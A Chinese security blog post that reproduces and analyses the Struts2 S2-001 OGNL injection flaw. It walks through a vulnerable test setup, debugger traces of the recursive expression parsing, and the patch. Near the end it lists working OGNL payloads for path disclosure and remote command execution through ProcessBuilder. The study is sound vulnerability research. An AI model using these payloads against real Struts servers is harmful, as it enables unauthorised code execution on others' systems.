『Java安全』Struts2 2.0.8 OGNL注入漏洞S2-001复现与浅析

已于 2022-08-09 16:44:43 修改
阅读量971 收藏 1
点赞数
分类专栏: # Struts 2 文章标签: java struts web安全 s2-001 ognl
于 2022-07-29 15:02:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/126050098
版权

文章目录

前言

学习一下S2漏洞的利用,参考其他师傅的文章

新版IDEA配置Struts 2

https://ho1aas.blog.csdn.net/article/details/126035484

漏洞简介

Struts2使用opensymphony.xwork 2.0.3组件解析OGNL,该组件导致OGNL注入漏洞,发送表单时内容会引发OGNL注入

影响范围

Struts 2 ≤ 2.0.8
xwork ≤ 2.0.3

漏洞复现

8u111 + Struts 2.0.8
在这里插入图片描述

环境配置

写一个action接受参数str

import com.opensymphony.xwork2.ActionSupport;

public class InputAction extends ActionSupport {
    private String str;

    public String getStr() {
        return str;
    }

    public void setStr(String str) {
        this.str = str;
    }

    public String execute(){
        return "success";
    }
}

写一个index.jsp发送表单,参数为str

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ taglib prefix="s" uri="/struts-tags" %>

<html>
  <head>
    <title>Index</title>
  </head>
  <body>
  This is the Index page.
    <s:form action="input">
      <s:textfield name="str" label="Input OGNL: " />
      <s:submit></s:submit>
    </s:form>
  </body>
</html>

在struts.xml配置action

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE struts PUBLIC
        "-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"
        "http://struts.apache.org/dtds/struts-2.0.dtd">

<struts>
    <package name="S2-001" extends="struts-default">
    <action name="input" class="InputAction" method="execute">
        <result name="success">index.jsp</result>
    </action>
    </package>
</struts>

复现操作

index.jsp发送包含OGNL的字符串即可

在这里插入图片描述

Struts 2 请求周期

(图源自参考文章)

代码审计

在struts-default.xml可以看到参数拦截器,s2用它来处理请求参数


工作流程是从拦截器链的doIntercept()开始,调用setParameters方法把变量压入参数栈

在这里插入图片描述
先不打断点开启debug,发送表单的时候再打断点,确保param和action是正确的

在这里插入图片描述

setParameters中,首先把参数全存到TreeMap,然后进入永真循环
在这里插入图片描述
然后获取参数的键值,调用参数栈的setValue入栈键值

在这里插入图片描述
setParameters总而言之就是把参数压入参数栈,之后就来到下一步

在这里插入图片描述
这一步进入了我们编写的action,然后根据结果进入了if判断,调用executeResult处理结果

在这里插入图片描述
进入execute

在这里插入图片描述
在conditionalParse进行处理

在这里插入图片描述
然后就来到了参数解析的环节,我们直接看处理参数%{str},原来表单的参数str也是一个OGNL表达式

在这里插入图片描述
第一个循环:从表单参数%{str}获取str,在栈里面查传参的值,结果是我们注入的OGNL,赋值给o
在这里插入图片描述
然后OGNL又被赋值给expression,进行二次解析

在这里插入图片描述
语法正确,进行第二轮OGNL解析

在这里插入图片描述
这里循环是递归的,因此就会造成OGNL注入

补丁修复分析

新加入解析次数判定,默认最大解析次数是1

在这里插入图片描述

利用

// 判断存在
%{2+3}

// tomcat path
%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

// web path
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

// RCE
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

// 无回显RCE
%{(new java.lang.ProcessBuilder(new java.lang.String[]{"calc.exe"})).start()}

参考

https://www.cnblogs.com/twosmi1e/p/14020361.html
https://cwiki.apache.org/confluence/display/WW/S2-001
https://su18.org/post/struts2-1/#s2-001

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://ho1aas.blog.csdn.net/article/details/126050098
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Confluence OGNL表达式注入漏洞复现与分析(CVE-2022-26134)
Brucetg的博客
06-06 4446
在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
Apache Struts中利用OGNL注入
weixin_30480583的博客
03-21 3291
前言 本文简要介绍了Apache StrutsOGNL注入缺陷,文章中介绍使用简单的应用程序复现OGNL注入。深入研究针对公共漏洞,并理解这类漏洞。 内容 安装Apache Tomcat服务器(入门) 熟悉Java应用程序在服务器上的工作方式(Web服务器基础知识) Struts应用程序示例(Struts应用程序示例) 表达语言注入(表达式语言注入) 了解OGNL注射(对象图导航语言...
Apache Struts OGNL表达式注入漏洞
weixin_30693183的博客
06-07 1122
漏洞名称: Apache Struts OGNL表达式注入漏洞 CNNVD编号: CNNVD-201306-105 发布时间: 2013-06-07 更新时间: 2013-06-07 危害等级: 漏洞类型: 威胁类型: 远程 CVE编号: CVE-2013-2135 ...
Java安全Struts2 2.1.8.1 参数名OGNL注入漏洞S2-003复现浅析
Ho1aAs‘s Blog
08-01 1161
Struts2解析参数名称使用了OGNL表达式,构建恶意OGNL表达式会造成注入
struts 2.0.8
06-17
struts-2.0.8-lib(最新版)
gmpy2-2.0.8-cp37-cp37m-win_amd64.whl
05-10
gmpy2-2.0.8-cp27-cp27m-win_amd64.whl,RsaCtfTool工具
gmpy2-2.0.8-cp39-cp39-win_amd64.whl.zip
最新发布
12-14
标题 "gmpy2-2.0.8-cp39-cp39-win_amd64.whl.zip" 指的是一个Python库的压缩包文件,它包含了一个名为 "gmpy2" 的软件包,版本为2.0.8。这个包是为Python 3.9版本编译的,并且适用于Windows操作系统,特别是AMD64...
struts2-core-2.0.8.jar
04-22
struts2-core-2.0.8.jar
pdfbox-2.0.8.jar,fontbox-2.0.8.jar,pdfbox-tools-2.0.8.jar
01-09
2. **fontbox-2.0.8.jar**: FontBox库是PDFBox的一个重要组成部分,专门用于处理字体和字形。在PDF文档中,字体是一个关键的元素,因为它们决定了文本的显示样式。FontBox提供了解析和操作PDF文档中使用的TrueType...
gmpy2-2.0.8-cp38-cp38-win_amd64.whl.zip
12-14
标题 "gmpy2-2.0.8-cp38-cp38-win_amd64.whl.zip" 指的是一个Python库的压缩包文件,它包含了一个名为 "gmpy2" 的软件包,版本为 "2.0.8",并针对Python解释器的版本 "cp38"(对应Python 3.8)进行了编译。...
高危漏洞预警 | Atlassian Confluence OGNL注入命令执行漏洞复现与分析报告
Fortinet_CHINA的博客
06-16 1769
近日,Volexity(volexity.com,以下简称为:Volexity)在对从Confluence Server系统收集到的数据进行彻底审查后,发现了攻击者启动Exp以实现远程代码执行,随后Volexity重新创建了该漏洞的利用并在最新版本的Confluence Server上进行了复现。Atlassian 已确认该漏洞,并上报给CVE,确认漏洞编号为“ CVE-2022-26134。Fortinet 中国安全团队针对此次漏洞信息,进行即时响应并成功验证。......
CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现
m0_72717546的博客
09-26 294
Confluence是一个专业的知识库协同工具,它可以进行企业知识管理与软件协同,是一个利于构建企业WIKI的Web应用。Confluence使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。是企业中强大的信息读取、存放的共享平台。在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或数据中心实例上执行任意代码。
Java安全Struts 2.3.14.2 action占位符OGNL注入漏洞S2-015复现浅析
Ho1aAs‘s Blog
08-29 979
action的name可以设置为*,当URL没有匹配到任何action的时候,就会匹配*对应的action;而一般开发中获取*对应的字符串,然后result返回以该字符串命名的jsp,获取该字符串用的是占位符{x},依照星号从左往右从1开始匹配例如:......
struts2.X心得15--OGNL表达式语言和struts标签案例解析
ykblog.github.io
03-06 2057
1.  传值分析 如果从jsp页面传过来的值,那么要用set注入接收值,还要用get传出去值;如果不写get方法那么,在后面接收值的jsp页面上通过域对象就不能直接接收action传出来的值;但是如果不是从一个jsp页面传进来的值,而是在这个action中直接new出来一个对象给其构造方法传值或者直接声明的一个变量值,那么可以不通过set注入值也可以不用get方法传值。 使用struts的标
Java安全Struts 2.3.14.2 重定向参数二次解析OGNL注入漏洞S2-012复现浅析
Ho1aAs‘s Blog
08-26 342
result是重定向并且配置参数时,该参数会从值栈弹出并进行OGNL解析,最后填充到URL完成重定向。
Confluence OGNL 注入 (CVE-2022-26134)
weixin_47515220的博客
09-26 1801
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于网络的企业 wiki。2022 年 6 月 2 日,Atlassian 发布了针对其 Confluence Server 和数据中心应用程序的安全公告,强调了一个严重严重的未经身份验证的远程代码执行漏洞OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码。
Java安全Struts 2.2.3 表单参数类型转换错误OGNL注入漏洞S2-007复现浅析
Ho1aAs‘s Blog
08-25 477
对表单参数使用validator验证时,如果遇到类型错误,参数值会先压入参数栈,之后会取出并被二次ognl解析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值